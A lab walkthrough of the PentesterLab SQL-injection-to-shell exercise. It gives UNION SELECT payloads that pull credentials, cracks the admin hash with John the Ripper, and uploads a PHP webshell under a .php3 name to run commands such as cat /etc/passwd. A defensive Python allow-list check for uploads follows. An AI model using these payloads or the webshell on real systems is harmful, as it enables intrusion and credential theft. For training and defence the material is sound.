From SQL Injection to Shell
Reference
Writeup
- Retrieving information
- Vulnerable parameter: /cat.php?id=
- Payload:
- Database version: 5.1.63-0+squeeze1
  UNION SELECT 1,@@version,3,4
- Current user: pentesterlab@localhost
  UNION SELECT 1,current_user(),3,4
- Current database: photoblog
  UNION SELECT 1,database(),3,4
- Tables: categories, pictures, users
  UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema != 'information_schema'
- Columns: id, title, img, cat, login, password
  UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_schema != 'information_schema'
- Username and password hash: admin:8efe310f9ab3efeae8d410a8e0166eb2
  UNION SELECT 1,concat(login,':',password),3,4 FROM users;
- Cracking the password
- An online MD5 hash lookup gives the password: P4ssw0rd
- Or use John the Ripper:
  $ john password --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt --rules
  Using default input encoding: UTF-8
  Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
  Press 'q' or Ctrl-C to abort, almost any other key for status
  P4ssw0rd         (admin)
- Uploading a Webshell and Code Execution
- Upload shell.php: because the .php extension is blocked, the upload is refused; renaming the file to .php3 or .php.test gets it uploaded successfully. File contents: <?php system($_GET['cmd']); ?>
- Next we need the path the uploaded files are stored under
- Upload any image and view the page source:
  <img src="admin/uploads/board_cover.jpg" alt="board" />
- So the uploaded shell.php3 ends up at admin/uploads/shell.php3
- Executing commands:
- http://10.0.2.151/admin/uploads/shell.php3?cmd=uname -a
- Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
- http://10.0.2.151/admin/uploads/shell.php3?cmd=ls
- board_cover.jpg cthulhu.png hacker.png ruby.jpg shell.jpg shell.php.test shell.php3
- http://10.0.2.151/admin/uploads/shell.php3?cmd=id
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- http://10.0.2.151/admin/uploads/shell.php3?cmd=cat /etc/passwd
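Why the .php3 / .php.test rename works, and what a fixed upload check looks like, as an added example (not code from PentesterLab or from this writeup). It assumes the exercise's upload form only refuses names ending in ".php", and the sample files and the JPEG header bytes are constructed here for the demonstration.

```python
# Added example, not from the exercise: an extension deny-list versus an
# allow-list with a magic-byte check, run over the filenames from the writeup.
import os

# Assumed mirror of the weak check in the exercise: only ".php" is refused,
# so "shell.php3" and "shell.php.test" pass straight through.
def denylist_rejects(filename: str) -> bool:
    return filename.lower().endswith(".php")

# Hardened variant: fixed allow-list of image extensions, exactly one extension
# (no "x.php.test" style double extensions, no path components), and the body
# must begin with the magic bytes of the type the extension claims.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

def allowlist_accepts(filename: str, data: bytes) -> bool:
    base = os.path.basename(filename)
    if base != filename or base.count(".") != 1:
        return False                      # path separators or double extension
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return False                      # .php3, .phtml, .test ... never allowed
    return any(data.startswith(magic) for magic in ALLOWED[ext])

WEBSHELL = b"<?php system($_GET['cmd']); ?>\n"   # body quoted in the writeup
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16         # constructed JPEG header

SAMPLES = {                                       # constructed test inputs
    "shell.php": WEBSHELL,
    "shell.php3": WEBSHELL,
    "shell.php.test": WEBSHELL,
    "shell.jpg": WEBSHELL,                        # PHP body under an image name
    "board_cover.jpg": JPEG,
}

def compare() -> dict:
    # name -> (denylist_rejects, allowlist_accepts) for every sample
    return {n: (denylist_rejects(n), allowlist_accepts(n, d)) for n, d in SAMPLES.items()}

if __name__ == "__main__":
    for name, (rejected, accepted) in compare().items():
        print(f"{name:16} denylist_rejects={rejected!s:5} allowlist_accepts={accepted}")
```

Even with the allow-list, the upload directory should be served without script execution and files stored under server-chosen names, so a bypass of the check still cannot give code execution.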